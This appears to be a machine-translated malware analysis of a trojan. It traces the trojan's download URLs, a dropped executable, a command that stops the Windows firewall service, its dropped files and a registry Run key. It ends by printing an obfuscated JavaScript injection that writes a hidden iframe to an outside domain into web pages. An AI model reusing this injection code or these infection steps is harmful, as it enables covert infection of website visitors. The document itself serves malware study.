See this message in ff. So the page is untied.
It turned out to be an "old friend" assassin group. have been dealing with the network horse that this group has generated many times.
Which hangs on a Trojan
Hxxp://www.es86.com/pic/ddb/2006692151148920.gif
Let's make an analysis of this.
Run the sample.
Releasing files
C:\win30.exe
Call cmd Run command/C net stop SharedAccess
Visit Web site
61.129.102.79
Address should be: hxxp://www.es86.com 80 port Communication
Download: Hxxp://www.es86.com/es86/db/dvbbs.mdb
This file is a RAR file.
Dvbbs.mdb releases the file as
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\ecompress.fne
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\eimgconverter.fne
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\elib.fne
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\hideproc.dll
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\nhook.dll
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\bots\vinavbar\svchost.exe
Writing to the registration table
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Svchost" = "C:\Program files\common Files\Microsoft Shared\Web Server Extensions\40\bots\vinavbar\svchost.exe"
Adding code to the HTM and aspx tails
<script>
P= " 60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,1 12,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62 "
P=eval ("String.fromCharCode" ("+p+"));
document.write (P);</script>
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.